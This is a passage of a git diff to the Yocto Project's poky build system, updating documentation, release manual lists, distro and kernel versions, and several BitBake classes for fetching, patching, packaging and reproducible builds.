phase, you can use the "apply=no" parameter with the -``SRC_URI`` statement: -:: +Conversely, if you have a file whose file type is ``.patch`` or ``.diff`` +and you want to exclude it so that the ``do_patch`` task does not apply +it during the patch phase, you can use the "apply=no" parameter with the +:term:`SRC_URI` statement:: SRC_URI = " \ git://path_to_repo/some_package \ - file://path_to_lots_of_patch_files \ - file://path_to_lots_of_patch_files/patch_file5;apply=no \ + file://file1.patch \ + file://file2.patch;apply=no \ " -In the -previous example, assuming all the files in the directory holding the -patch files end with either ``.patch`` or ``.diff``, every file would be -applied as a patch by default except for the ``patch_file5`` patch. +In the previous example ``file1.patch`` would be applied as a patch by default +while ``file2.patch`` would not be applied. You can find out more about the patching process in the ":ref:`patching-dev-environment`" section in diff --git a/poky/documentation/releases.rst b/poky/documentation/releases.rst index 78f604e2a1..57e4566e1b 100644 --- a/poky/documentation/releases.rst +++ b/poky/documentation/releases.rst @@ -1,11 +1,28 @@ .. SPDX-License-Identifier: CC-BY-SA-2.0-UK -========================= - Current Release Manuals -========================= +=========================== + Supported Release Manuals +=========================== + +****************************** +Release Series 3.4 (honister) +****************************** + +- :yocto_docs:`3.4 Documentation </3.4>` +- :yocto_docs:`3.4.1 Documentation </3.4.1>` + +****************************** +Release Series 3.3 (hardknott) +****************************** + +- :yocto_docs:`3.3 Documentation </3.3>` +- :yocto_docs:`3.3.1 Documentation </3.3.1>` +- :yocto_docs:`3.3.2 Documentation </3.3.2>` +- :yocto_docs:`3.3.3 Documentation </3.3.3>` +- :yocto_docs:`3.3.4 Documentation </3.3.4>` **************************** -3.1 'dunfell' Release Series +Release Series 3.1 (dunfell) **************************** - :yocto_docs:`3.1 Documentation </3.1>` @@ -19,13 +36,26 @@ - :yocto_docs:`3.1.8 Documentation </3.1.8>` - :yocto_docs:`3.1.9 Documentation </3.1.9>` - :yocto_docs:`3.1.10 Documentation </3.1.10>` +- :yocto_docs:`3.1.11 Documentation </3.1.11>` +- :yocto_docs:`3.1.12 Documentation </3.1.12>` +- :yocto_docs:`3.1.13 Documentation </3.1.13>` ========================== - Previous Release Manuals + Outdated Release Manuals ========================== +******************************* +Release Series 3.2 (gatesgarth) +******************************* + +- :yocto_docs:`3.2 Documentation </3.2>` +- :yocto_docs:`3.2.1 Documentation </3.2.1>` +- :yocto_docs:`3.2.2 Documentation </3.2.2>` +- :yocto_docs:`3.2.3 Documentation </3.2.3>` +- :yocto_docs:`3.2.4 Documentation </3.2.4>` + ************************* -3.0 'zeus' Release Series +Release Series 3.0 (zeus) ************************* - :yocto_docs:`3.0 Documentation </3.0>` @@ -35,7 +65,7 @@ - :yocto_docs:`3.0.4 Documentation </3.0.4>` **************************** -2.7 'warrior' Release Series +Release Series 2.7 (warrior) **************************** - :yocto_docs:`2.7 Documentation </2.7>` @@ -45,7 +75,7 @@ - :yocto_docs:`2.7.4 Documentation </2.7.4>` ************************* -2.6 'thud' Release Series +Release Series 2.6 (thud) ************************* - :yocto_docs:`2.6 Documentation </2.6>` @@ -55,16 +85,16 @@ - :yocto_docs:`2.6.4 Documentation </2.6.4>` ************************* -2.5 'sumo' Release Series +Release Series 2.5 (sumo) ************************* - :yocto_docs:`2.5 Documentation </2.5>` - :yocto_docs:`2.5.1 Documentation </2.5.1>` - :yocto_docs:`2.5.2 Documentation </2.5.2>` - :yocto_docs:`2.5.3 Documentation </2.5.3>` - + ************************** -2.4 'rocko' Release Series +Release Series 2.4 (rocko) ************************** - :yocto_docs:`2.4 Documentation </2.4>` @@ -74,7 +104,7 @@ - :yocto_docs:`2.4.4 Documentation </2.4.4>` ************************* -2.3 'pyro' Release Series +Release Series 2.3 (pyro) ************************* - :yocto_docs:`2.3 Documentation </2.3>` @@ -84,7 +114,7 @@ - :yocto_docs:`2.3.4 Documentation </2.3.4>` ************************** -2.2 'morty' Release Series +Release Series 2.2 (morty) ************************** - :yocto_docs:`2.2 Documentation </2.2>` @@ -93,7 +123,7 @@ - :yocto_docs:`2.2.3 Documentation </2.2.3>` **************************** -2.1 'krogoth' Release Series +Release Series 2.1 (krogoth) **************************** - :yocto_docs:`2.1 Documentation </2.1>` @@ -102,7 +132,7 @@ - :yocto_docs:`2.1.3 Documentation </2.1.3>` *************************** -2.0 'jethro' Release Series +Release Series 2.0 (jethro) *************************** - :yocto_docs:`1.9 Documentation </1.9>` @@ -112,7 +142,7 @@ - :yocto_docs:`2.0.3 Documentation </2.0.3>` ************************* -1.8 'fido' Release Series +Release Series 1.8 (fido) ************************* - :yocto_docs:`1.8 Documentation </1.8>` @@ -120,7 +150,7 @@ - :yocto_docs:`1.8.2 Documentation </1.8.2>` ************************** -1.7 'dizzy' Release Series +Release Series 1.7 (dizzy) ************************** - :yocto_docs:`1.7 Documentation </1.7>` @@ -129,16 +159,16 @@ - :yocto_docs:`1.7.3 Documentation </1.7.3>` ************************** -1.6 'daisy' Release Series +Release Series 1.6 (daisy) ************************** - :yocto_docs:`1.6 Documentation </1.6>` - :yocto_docs:`1.6.1 Documentation </1.6.1>` - :yocto_docs:`1.6.2 Documentation </1.6.2>` - :yocto_docs:`1.6.3 Documentation </1.6.3>` - + ************************* -1.5 'dora' Release Series +Release Series 1.5 (dora) ************************* - :yocto_docs:`1.5 Documentation </1.5>` @@ -148,7 +178,7 @@ - :yocto_docs:`1.5.4 Documentation </1.5.4>` ************************** -1.4 'dylan' Release Series +Release Series 1.4 (dylan) ************************** - :yocto_docs:`1.4 Documentation </1.4>` @@ -157,9 +187,9 @@ - :yocto_docs:`1.4.3 Documentation </1.4.3>` - :yocto_docs:`1.4.4 Documentation </1.4.4>` - :yocto_docs:`1.4.5 Documentation </1.4.5>` - + ************************** -1.3 'danny' Release Series +Release Series 1.3 (danny) ************************** - :yocto_docs:`1.3 Documentation </1.3>` @@ -167,7 +197,7 @@ - :yocto_docs:`1.3.2 Documentation </1.3.2>` *************************** -1.2 'denzil' Release Series +Release Series 1.2 (denzil) *************************** - :yocto_docs:`1.2 Documentation </1.2>` @@ -175,7 +205,7 @@ - :yocto_docs:`1.2.2 Documentation </1.2.2>` *************************** -1.1 'edison' Release Series +Release Series 1.1 (edison) *************************** - :yocto_docs:`1.1 Documentation </1.1>` @@ -183,7 +213,7 @@ - :yocto_docs:`1.1.2 Documentation </1.1.2>` **************************** -1.0 'bernard' Release Series +Release Series 1.0 (bernard) **************************** - :yocto_docs:`1.0 Documentation </1.0>` @@ -191,7 +221,7 @@ - :yocto_docs:`1.0.2 Documentation </1.0.2>` **************************** -0.9 'laverne' Release Series +Release Series 0.9 (laverne) **************************** - :yocto_docs:`0.9 Documentation </0.9>` diff --git a/poky/documentation/sphinx-static/switchers.js b/poky/documentation/sphinx-static/switchers.js index a6432ae9b0..bda15485c0 100644 --- a/poky/documentation/sphinx-static/switchers.js +++ b/poky/documentation/sphinx-static/switchers.js @@ -2,8 +2,11 @@ 'use strict'; var all_versions = { - 'dev': 'dev (3.3)', - '3.1.10': '3.1.10', + 'dev': 'dev (3.5)', + '3.4.1': '3.4.1', + '3.3.4': '3.3.4', + '3.2.4': '3.2.4', + '3.1.13': '3.1.13', '3.0.4': '3.0.4', '2.7.4': '2.7.4', }; diff --git a/poky/meta-poky/conf/distro/poky.conf b/poky/meta-poky/conf/distro/poky.conf index 11897c7422..7274657037 100644 --- a/poky/meta-poky/conf/distro/poky.conf +++ b/poky/meta-poky/conf/distro/poky.conf @@ -1,6 +1,6 @@ DISTRO = "poky" DISTRO_NAME = "Poky (Yocto Project Reference Distro)" -DISTRO_VERSION = "3.1.10" +DISTRO_VERSION = "3.1.14" DISTRO_CODENAME = "dunfell" SDK_VENDOR = "-pokysdk" SDK_VERSION = "${@d.getVar('DISTRO_VERSION').replace('snapshot-${DATE}', 'snapshot')}" @@ -24,7 +24,7 @@ DISTRO_FEATURES ?= "${DISTRO_FEATURES_DEFAULT} ${POKY_DEFAULT_DISTRO_FEATURES}" PREFERRED_VERSION_linux-yocto ?= "5.4%" SDK_NAME = "${DISTRO}-${TCLIBC}-${SDKMACHINE}-${IMAGE_BASENAME}-${TUNE_PKGARCH}-${MACHINE}" -SDKPATH = "/opt/${DISTRO}/${SDK_VERSION}" +SDKPATHINSTALL = "/opt/${DISTRO}/${SDK_VERSION}" DISTRO_EXTRA_RDEPENDS += " ${POKY_DEFAULT_EXTRA_RDEPENDS}" DISTRO_EXTRA_RRECOMMENDS += " ${POKY_DEFAULT_EXTRA_RRECOMMENDS}" @@ -61,11 +61,13 @@ SANITY_TESTED_DISTROS ?= " \ fedora-31 \n \ fedora-32 \n \ fedora-33 \n \ + fedora-34 \n \ centos-7 \n \ centos-8 \n \ debian-8 \n \ debian-9 \n \ debian-10 \n \ + debian-11 \n \ opensuseleap-15.1 \n \ opensuseleap-15.2 \n \ " diff --git a/poky/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb b/poky/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb index 07b83276fb..8a27e3a791 100644 --- a/poky/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb +++ b/poky/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb @@ -11,7 +11,7 @@ SRCREV = "1a3e1343761b30750bed70e0fd688f6d3c7b3717" PV = "0.1+git${SRCPV}" PR = "r2" -SRC_URI = "git://git.yoctoproject.org/dbus-wait" +SRC_URI = "git://git.yoctoproject.org/dbus-wait;branch=master" UPSTREAM_CHECK_COMMITS = "1" RECIPE_NO_UPDATE_REASON = "This recipe is used to test devtool upgrade feature" diff --git a/poky/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded b/poky/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded index 32ec4b14fa..fbe90d6c6b 100644 --- a/poky/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded +++ b/poky/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded @@ -10,7 +10,7 @@ DEPENDS = "dbus" SRCREV = "6cc6077a36fe2648a5f993fe7c16c9632f946517" PV = "0.1+git${SRCPV}" -SRC_URI = "git://git.yoctoproject.org/dbus-wait" +SRC_URI = "git://git.yoctoproject.org/dbus-wait;branch=master" UPSTREAM_CHECK_COMMITS = "1" RECIPE_NO_UPDATE_REASON = "This recipe is used to test devtool upgrade feature" diff --git a/poky/meta-yocto-bsp/recipes-kernel/linux/linux-yocto_5.4.bbappend b/poky/meta-yocto-bsp/recipes-kernel/linux/linux-yocto_5.4.bbappend index 35147d2da8..cd059c06c4 100644 --- a/poky/meta-yocto-bsp/recipes-kernel/linux/linux-yocto_5.4.bbappend +++ b/poky/meta-yocto-bsp/recipes-kernel/linux/linux-yocto_5.4.bbappend @@ -7,8 +7,8 @@ KMACHINE_genericx86 ?= "common-pc" KMACHINE_genericx86-64 ?= "common-pc-64" KMACHINE_beaglebone-yocto ?= "beaglebone" -SRCREV_machine_genericx86 ?= "31db2b47ac7d8508080fbb7344399b501216de66" -SRCREV_machine_genericx86-64 ?= "31db2b47ac7d8508080fbb7344399b501216de66" +SRCREV_machine_genericx86 ?= "76404f1ae59698b6a446dba29c885ca78c69c330" +SRCREV_machine_genericx86-64 ?= "76404f1ae59698b6a446dba29c885ca78c69c330" SRCREV_machine_edgerouter ?= "706efec4c1e270ec5dda92275898cd465dfdc7dd" SRCREV_machine_beaglebone-yocto ?= "706efec4c1e270ec5dda92275898cd465dfdc7dd" @@ -17,7 +17,7 @@ COMPATIBLE_MACHINE_genericx86-64 = "genericx86-64" COMPATIBLE_MACHINE_edgerouter = "edgerouter" COMPATIBLE_MACHINE_beaglebone-yocto = "beaglebone-yocto" -LINUX_VERSION_genericx86 = "5.4.94" -LINUX_VERSION_genericx86-64 = "5.4.94" +LINUX_VERSION_genericx86 = "5.4.158" +LINUX_VERSION_genericx86-64 = "5.4.158" LINUX_VERSION_edgerouter = "5.4.58" LINUX_VERSION_beaglebone-yocto = "5.4.58" diff --git a/poky/meta/classes/base.bbclass b/poky/meta/classes/base.bbclass index 8a1b5f79c1..9ed736b0e1 100644 --- a/poky/meta/classes/base.bbclass +++ b/poky/meta/classes/base.bbclass @@ -153,14 +153,14 @@ do_fetch[vardeps] += "SRCREV" python base_do_fetch() { src_uri = (d.getVar('SRC_URI') or "").split() - if len(src_uri) == 0: + if not src_uri: return try: fetcher = bb.fetch2.Fetch(src_uri, d) fetcher.download() except bb.fetch2.BBFetchException as e: - bb.fatal(str(e)) + bb.fatal("Bitbake Fetcher Error: " + repr(e)) } addtask unpack after do_fetch @@ -170,14 +170,14 @@ do_unpack[cleandirs] = "${@d.getVar('S') if os.path.normpath(d.getVar('S')) != o python base_do_unpack() { src_uri = (d.getVar('SRC_URI') or "").split() - if len(src_uri) == 0: + if not src_uri: return try: fetcher = bb.fetch2.Fetch(src_uri, d) fetcher.unpack(d.getVar('WORKDIR')) except bb.fetch2.BBFetchException as e: - bb.fatal(str(e)) + bb.fatal("Bitbake Fetcher Error: " + repr(e)) } def get_layers_branch_rev(d): @@ -688,7 +688,7 @@ python () { if os.path.basename(p) == machine and os.path.isdir(p): paths.append(p) - if len(paths) != 0: + if paths: for s in srcuri.split(): if not s.startswith("file://"): continue @@ -721,7 +721,7 @@ do_cleansstate[nostamp] = "1" python do_cleanall() { src_uri = (d.getVar('SRC_URI') or "").split() - if len(src_uri) == 0: + if not src_uri: return try: diff --git a/poky/meta/classes/buildhistory.bbclass b/poky/meta/classes/buildhistory.bbclass index 44a66df962..2746996cbb 100644 --- a/poky/meta/classes/buildhistory.bbclass +++ b/poky/meta/classes/buildhistory.bbclass @@ -953,23 +953,19 @@ def write_latest_srcrev(d, pkghistdir): value = value.replace('"', '').strip() old_tag_srcrevs[key] = value with open(srcrevfile, 'w') as f: - orig_srcrev = d.getVar('SRCREV', False) or 'INVALID' - if orig_srcrev != 'INVALID': - f.write('# SRCREV = "%s"\n' % orig_srcrev) - if len(srcrevs) > 1: - for name, srcrev in sorted(srcrevs.items()): - orig_srcrev = d.getVar('SRCREV_%s' % name, False) - if orig_srcrev: - f.write('# SRCREV_%s = "%s"\n' % (name, orig_srcrev)) - f.write('SRCREV_%s = "%s"\n' % (name, srcrev)) - else: - f.write('SRCREV = "%s"\n' % next(iter(srcrevs.values()))) - if len(tag_srcrevs) > 0: - for name, srcrev in sorted(tag_srcrevs.items()): - f.write('# tag_%s = "%s"\n' % (name, srcrev)) - if name in old_tag_srcrevs and old_tag_srcrevs[name] != srcrev: - pkg = d.getVar('PN') - bb.warn("Revision for tag %s in package %s was changed since last build (from %s to %s)" % (name, pkg, old_tag_srcrevs[name], srcrev)) + for name, srcrev in sorted(srcrevs.items()): + suffix = "_" + name + if name == "default": + suffix = "" + orig_srcrev = d.getVar('SRCREV%s' % suffix, False) + if orig_srcrev: + f.write('# SRCREV%s = "%s"\n' % (suffix, orig_srcrev)) + f.write('SRCREV%s = "%s"\n' % (suffix, srcrev)) + for name, srcrev in sorted(tag_srcrevs.items()): + f.write('# tag_%s = "%s"\n' % (name, srcrev)) + if name in old_tag_srcrevs and old_tag_srcrevs[name] != srcrev: + pkg = d.getVar('PN') + bb.warn("Revision for tag %s in package %s was changed since last build (from %s to %s)" % (name, pkg, old_tag_srcrevs[name], srcrev)) else: if os.path.exists(srcrevfile): diff --git a/poky/meta/classes/cve-check.bbclass b/poky/meta/classes/cve-check.bbclass index b6df2c31da..6eecbdbf13 100644 --- a/poky/meta/classes/cve-check.bbclass +++ b/poky/meta/classes/cve-check.bbclass @@ -110,7 +110,8 @@ python do_cve_check () { } addtask cve_check before do_build after do_fetch -do_cve_check[depends] = "cve-update-db-native:do_populate_cve_db" +do_cve_check[lockfiles] += "${CVE_CHECK_DB_FILE_LOCK}" +do_cve_check[depends] = "cve-update-db-native:do_fetch" do_cve_check[nostamp] = "1" python cve_check_cleanup () { diff --git a/poky/meta/classes/devtool-source.bbclass b/poky/meta/classes/devtool-source.bbclass index 280d6009f3..41900e651f 100644 --- a/poky/meta/classes/devtool-source.bbclass +++ b/poky/meta/classes/devtool-source.bbclass @@ -199,6 +199,7 @@ python devtool_post_patch() { # Run do_patch function with the override applied localdata = bb.data.createCopy(d) localdata.setVar('OVERRIDES', ':'.join(no_overrides)) + localdata.setVar('FILESOVERRIDES', ':'.join(no_overrides)) bb.build.exec_func('do_patch', localdata) rm_patches() # Now we need to reconcile the dev branch with the no-overrides one @@ -216,7 +217,8 @@ python devtool_post_patch() { # Reset back to the initial commit on a new branch bb.process.run('git checkout %s -b devtool-override-%s' % (initial_rev, override), cwd=srcsubdir) # Run do_patch function with the override applied - localdata.appendVar('OVERRIDES', ':%s' % override) + localdata.setVar('OVERRIDES', ':'.join(no_overrides + [override])) + localdata.setVar('FILESOVERRIDES', ':'.join(no_overrides + [override])) bb.build.exec_func('do_patch', localdata) rm_patches() # Now we need to reconcile the new branch with the no-overrides one diff --git a/poky/meta/classes/devupstream.bbclass b/poky/meta/classes/devupstream.bbclass index 7780c5482c..97e137cb40 100644 --- a/poky/meta/classes/devupstream.bbclass +++ b/poky/meta/classes/devupstream.bbclass @@ -4,7 +4,7 @@ # # Usage: # BBCLASSEXTEND = "devupstream:target" -# SRC_URI_class-devupstream = "git://git.example.com/example" +# SRC_URI_class-devupstream = "git://git.example.com/example;branch=master" # SRCREV_class-devupstream = "abcdef" # # If the first entry in SRC_URI is a git: URL then S is rewritten to diff --git a/poky/meta/classes/externalsrc.bbclass b/poky/meta/classes/externalsrc.bbclass index c7fcdca6ef..0e0a3ae89c 100644 --- a/poky/meta/classes/externalsrc.bbclass +++ b/poky/meta/classes/externalsrc.bbclass @@ -108,6 +108,15 @@ python () { if local_srcuri and task in fetch_tasks: continue bb.build.deltask(task, d) + if bb.data.inherits_class('reproducible_build', d) and task == 'do_unpack': + # The reproducible_build's create_source_date_epoch_stamp function must + # be run after the source is available and before the + # do_deploy_source_date_epoch task. In the normal case, it's attached + # to do_unpack as a postfuncs, but since we removed do_unpack (above) + # we need to move the function elsewhere. The easiest thing to do is + # move it into the prefuncs of the do_deploy_source_date_epoch task. + # This is safe, as externalsrc runs with the source already unpacked. + d.prependVarFlag('do_deploy_source_date_epoch', 'prefuncs', 'create_source_date_epoch_stamp ') d.prependVarFlag('do_compile', 'prefuncs', "externalsrc_compile_prefunc ") d.prependVarFlag('do_configure', 'prefuncs', "externalsrc_configure_prefunc ") diff --git a/poky/meta/classes/image_types.bbclass b/poky/meta/classes/image_types.bbclass index ff42ac9423..6dc0e094d0 100644 --- a/poky/meta/classes/image_types.bbclass +++ b/poky/meta/classes/image_types.bbclass @@ -240,7 +240,7 @@ EXTRA_IMAGECMD_jffs2 ?= "--pad ${JFFS2_ENDIANNESS} --eraseblock=${JFFS2_ERASEBLO EXTRA_IMAGECMD_ext2 ?= "-i 4096" EXTRA_IMAGECMD_ext3 ?= "-i 4096" EXTRA_IMAGECMD_ext4 ?= "-i 4096" -EXTRA_IMAGECMD_btrfs ?= "-n 4096" +EXTRA_IMAGECMD_btrfs ?= "-n 4096 --shrink" EXTRA_IMAGECMD_f2fs ?= "" do_image_cpio[depends] += "cpio-native:do_populate_sysroot" diff --git a/poky/meta/classes/libc-package.bbclass b/poky/meta/classes/libc-package.bbclass index de3b4250c7..1143f538d6 100644 --- a/poky/meta/classes/libc-package.bbclass +++ b/poky/meta/classes/libc-package.bbclass @@ -355,7 +355,7 @@ python package_do_split_gconvs () { m.write("\t@echo 'Progress %d/%d'\n" % (i, total)) m.write("\t" + makerecipe + "\n\n") d.setVar("EXTRA_OEMAKE", "-C %s ${PARALLEL_MAKE}" % (os.path.dirname(makefile))) - d.setVarFlag("oe_runmake", "progress", "outof:Progress\s(\d+)/(\d+)") + d.setVarFlag("oe_runmake", "progress", r"outof:Progress\s(\d+)/(\d+)") bb.note("Executing binary locale generation makefile") bb.build.exec_func("oe_runmake", d) bb.note("collecting binary locales from locale tree") diff --git a/poky/meta/classes/license.bbclass b/poky/meta/classes/license.bbclass index 73f99e87a8..6b03221c7f 100644 --- a/poky/meta/classes/license.bbclass +++ b/poky/meta/classes/license.bbclass @@ -153,6 +153,10 @@ def find_license_files(d): find_license(node.s.replace("+", "").replace("*", "")) self.generic_visit(node) + def visit_Constant(self, node): + find_license(node.value.replace("+", "").replace("*", "")) + self.generic_visit(node) + def find_license(license_type): try: bb.utils.mkdirhier(gen_lic_dest) diff --git a/poky/meta/classes/mirrors.bbclass b/poky/meta/classes/mirrors.bbclass index 87bba41472..a36236df9f 100644 --- a/poky/meta/classes/mirrors.bbclass +++ b/poky/meta/classes/mirrors.bbclass @@ -29,7 +29,6 @@ ftp://dante.ctan.org/tex-archive ftp://ftp.fu-berlin.de/tex/CTAN \n \ ftp://dante.ctan.org/tex-archive http://sunsite.sut.ac.jp/pub/archives/ctan/ \n \ ftp://dante.ctan.org/tex-archive http://ctan.unsw.edu.au/ \n \ ftp://ftp.gnutls.org/gcrypt/gnutls ${GNUPG_MIRROR}/gnutls \n \ -http://ftp.info-zip.org/pub/infozip/src/ http://mirror.switch.ch/ftp/mirror/infozip/src/ \n \ http://ftp.info-zip.org/pub/infozip/src/ ftp://sunsite.icm.edu.pl/pub/unix/archiving/info-zip/src/ \n \ http://www.mirrorservice.org/sites/lsof.itap.purdue.edu/pub/tools/unix/lsof/ http://www.mirrorservice.org/sites/lsof.itap.purdue.edu/pub/tools/unix/lsof/OLD/ \n \ ${APACHE_MIRROR} http://www.us.apache.org/dist \n \ @@ -62,6 +61,8 @@ ftp://.*/.* http://sources.openembedded.org/ \n \ npm://.*/?.* http://sources.openembedded.org/ \n \ ${CPAN_MIRROR} http://cpan.metacpan.org/ \n \ ${CPAN_MIRROR} http://search.cpan.org/CPAN/ \n \ +https?$://downloads.yoctoproject.org/releases/uninative/ https://mirrors.kernel.org/yocto/uninative/ \n \ +https?$://downloads.yoctoproject.org/mirror/sources/ https://mirrors.kernel.org/yocto-sources/ \n \ " # Use MIRRORS to provide git repo fallbacks using the https protocol, for cases diff --git a/poky/meta/classes/package.bbclass b/poky/meta/classes/package.bbclass index 3ff74c9f31..702427fecc 100644 --- a/poky/meta/classes/package.bbclass +++ b/poky/meta/classes/package.bbclass @@ -1989,12 +1989,12 @@ python package_do_pkgconfig () { for pkg in packages.split(): pkgconfig_provided[pkg] = [] pkgconfig_needed[pkg] = [] - for file in pkgfiles[pkg]: + for file in sorted(pkgfiles[pkg]): m = pc_re.match(file) if m: pd = bb.data.init() name = m.group(1) - pkgconfig_provided[pkg].append(name) + pkgconfig_provided[pkg].append(os.path.basename(name)) if not os.access(file, os.R_OK): continue with open(file, 'r') as f: @@ -2017,7 +2017,7 @@ python package_do_pkgconfig () { pkgs_file = os.path.join(shlibswork_dir, pkg + ".pclist") if pkgconfig_provided[pkg] != []: with open(pkgs_file, 'w') as f: - for p in pkgconfig_provided[pkg]: + for p in sorted(pkgconfig_provided[pkg]): f.write('%s\n' % p) # Go from least to most specific since the last one found wins diff --git a/poky/meta/classes/package_deb.bbclass b/poky/meta/classes/package_deb.bbclass index 790b26aef2..fa8c6c82ff 100644 --- a/poky/meta/classes/package_deb.bbclass +++ b/poky/meta/classes/package_deb.bbclass @@ -315,8 +315,8 @@ do_package_write_deb[dirs] = "${PKGWRITEDIRDEB}" do_package_write_deb[cleandirs] = "${PKGWRITEDIRDEB}" do_package_write_deb[umask] = "022" do_package_write_deb[depends] += "${@oe.utils.build_depends_string(d.getVar('PACKAGE_WRITE_DEPS'), 'do_populate_sysroot')}" -addtask package_write_deb after do_packagedata do_package - +EPOCHTASK ??= "" +addtask package_write_deb after do_packagedata do_package ${EPOCHTASK} PACKAGEINDEXDEPS += "dpkg-native:do_populate_sysroot" PACKAGEINDEXDEPS += "apt-native:do_populate_sysroot" diff --git a/poky/meta/classes/package_ipk.bbclass b/poky/meta/classes/package_ipk.bbclass index c008559e4a..4927cfba00 100644 --- a/poky/meta/classes/package_ipk.bbclass +++ b/poky/meta/classes/package_ipk.bbclass @@ -274,7 +274,8 @@ do_package_write_ipk[dirs] = "${PKGWRITEDIRIPK}" do_package_write_ipk[cleandirs] = "${PKGWRITEDIRIPK}" do_package_write_ipk[umask] = "022" do_package_write_ipk[depends] += "${@oe.utils.build_depends_string(d.getVar('PACKAGE_WRITE_DEPS'), 'do_populate_sysroot')}" -addtask package_write_ipk after do_packagedata do_package +EPOCHTASK ??= "" +addtask package_write_ipk after do_packagedata do_package ${EPOCHTASK} PACKAGEINDEXDEPS += "opkg-utils-native:do_populate_sysroot" PACKAGEINDEXDEPS += "opkg-native:do_populate_sysroot" diff --git a/poky/meta/classes/package_rpm.bbclass b/poky/meta/classes/package_rpm.bbclass index fc9007922a..65587d228b 100644 --- a/poky/meta/classes/package_rpm.bbclass +++ b/poky/meta/classes/package_rpm.bbclass @@ -743,7 +743,8 @@ do_package_write_rpm[dirs] = "${PKGWRITEDIRRPM}" do_package_write_rpm[cleandirs] = "${PKGWRITEDIRRPM}" do_package_write_rpm[umask] = "022" do_package_write_rpm[depends] += "${@oe.utils.build_depends_string(d.getVar('PACKAGE_WRITE_DEPS'), 'do_populate_sysroot')}" -addtask package_write_rpm after do_packagedata do_package +EPOCHTASK ??= "" +addtask package_write_rpm after do_packagedata do_package ${EPOCHTASK} PACKAGEINDEXDEPS += "rpm-native:do_populate_sysroot" PACKAGEINDEXDEPS += "createrepo-c-native:do_populate_sysroot" diff --git a/poky/meta/classes/patch.bbclass b/poky/meta/classes/patch.bbclass index 25ec089ae1..484d27ac76 100644 --- a/poky/meta/classes/patch.bbclass +++ b/poky/meta/classes/patch.bbclass @@ -131,6 +131,9 @@ python patch_do_patch() { patchdir = parm["patchdir"] if not os.path.isabs(patchdir): patchdir = os.path.join(s, patchdir) + if not os.path.isdir(patchdir): + bb.fatal("Target directory '%s' not found, patchdir '%s' is incorrect in patch file '%s'" % + (patchdir, parm["patchdir"], parm['patchname'])) else: patchdir = s @@ -147,12 +150,12 @@ python patch_do_patch() { patchset.Import({"file":local, "strippath": parm['striplevel']}, True) except Exception as exc: bb.utils.remove(process_tmpdir, True) - bb.fatal(str(exc)) + bb.fatal("Importing patch '%s' with striplevel '%s'\n%s" % (parm['patchname'], parm['striplevel'], str(exc))) try: resolver.Resolve() except bb.BBHandledException as e: bb.utils.remove(process_tmpdir, True) - bb.fatal(str(e)) + bb.fatal("Applying patch '%s' on target directory '%s'\n%s" % (parm['patchname'], patchdir, str(e))) bb.utils.remove(process_tmpdir, True) del os.environ['TMPDIR'] diff --git a/poky/meta/classes/populate_sdk_base.bbclass b/poky/meta/classes/populate_sdk_base.bbclass index b46f1aed27..396792f0f7 100644 --- a/poky/meta/classes/populate_sdk_base.bbclass +++ b/poky/meta/classes/populate_sdk_base.bbclass @@ -275,6 +275,7 @@ EOF # substitute variables sed -i -e 's#@SDK_ARCH@#${SDK_ARCH}#g' \ -e 's#@SDKPATH@#${SDKPATH}#g' \ + -e 's#@SDKPATHINSTALL@#${SDKPATHINSTALL}#g' \ -e 's#@SDKEXTPATH@#${SDKEXTPATH}#g' \ -e 's#@OLDEST_KERNEL@#${SDK_OLDEST_KERNEL}#g' \ -e 's#@REAL_MULTIMACH_TARGET_SYS@#${REAL_MULTIMACH_TARGET_SYS}#g' \ diff --git a/poky/meta/classes/reproducible_build.bbclass b/poky/meta/classes/reproducible_build.bbclass index f06e00d70d..3c01dbd5b3 100644 --- a/poky/meta/classes/reproducible_build.bbclass +++ b/poky/meta/classes/reproducible_build.bbclass @@ -1,17 +1,38 @@ # reproducible_build.bbclass # -# Sets SOURCE_DATE_EPOCH in each component's build environment. +# Sets the default SOURCE_DATE_EPOCH in each component's build environment. +# The format is number of seconds since the system epoch. +# # Upstream components (generally) respect this environment variable, # using it in place of the "current" date and time. # See https://reproducible-builds.org/specs/source-date-epoch/ # -# After sources are unpacked but before they are patched, we set a reproducible value for SOURCE_DATE_EPOCH. -# This value should be reproducible for anyone who builds the same revision from the same sources. +# The default value of SOURCE_DATE_EPOCH comes from the function +# get_source_date_epoch_value which reads from the SDE_FILE, or if the file +# is not available (or set to 0) will use the fallback of +# SOURCE_DATE_EPOCH_FALLBACK. +# +# The SDE_FILE is normally constructed from the function +# create_source_date_epoch_stamp which is typically added as a postfuncs to +# the do_unpack task. If a recipe does NOT have do_unpack, it should be added +# to a task that runs after the source is available and before the +# do_deploy_source_date_epoch task is executed. +# +# If a recipe wishes to override the default behavior it should set it's own +# SOURCE_DATE_EPOCH or override the do_deploy_source_date_epoch_stamp task +# with recipe-specific functionality to write the appropriate +# SOURCE_DATE_EPOCH into the SDE_FILE. +# +# SOURCE_DATE_EPOCH is intended to be a reproducible value. This value should +# be reproducible for anyone who builds the same revision from the same +# sources. # -# There are 4 ways we determine SOURCE_DATE_EPOCH: +# There are 4 ways the create_source_date_epoch_stamp function determines what +# becomes SOURCE_DATE_EPOCH: # # 1. Use the value from __source_date_epoch.txt file if this file exists. -# This file was most likely created in the previous build by one of the following methods 2,3,4. +# This file was most likely created in the previous build by one of the +# following methods 2,3,4. # Alternatively, it can be provided by a recipe via SRC_URI. # # If the file does not exist: @@ -22,20 +43,16 @@ # 3. Use the mtime of "known" files such as NEWS, CHANGLELOG, ... # This works for well-kept repositories distributed via tarball. # -# 4. Use the modification time of the youngest file in the source tree, if there is one. +# 4. Use the modification time of the youngest file in the source tree, if +# there is one. # This will be the newest file from the distribution tarball, if any. # -# 5. Fall back to a fixed timestamp. +# 5. Fall back to a fixed timestamp (SOURCE_DATE_EPOCH_FALLBACK). # -# Once the value of SOURCE_DATE_EPOCH is determined, it is stored in the recipe's SDE_FILE. -# If none of these mechanisms are suitable, replace the do_deploy_source_date_epoch task -# with recipe-specific functionality to write the appropriate SOURCE_DATE_EPOCH into the SDE_FILE. -# -# If this file is found by other tasks, the value is 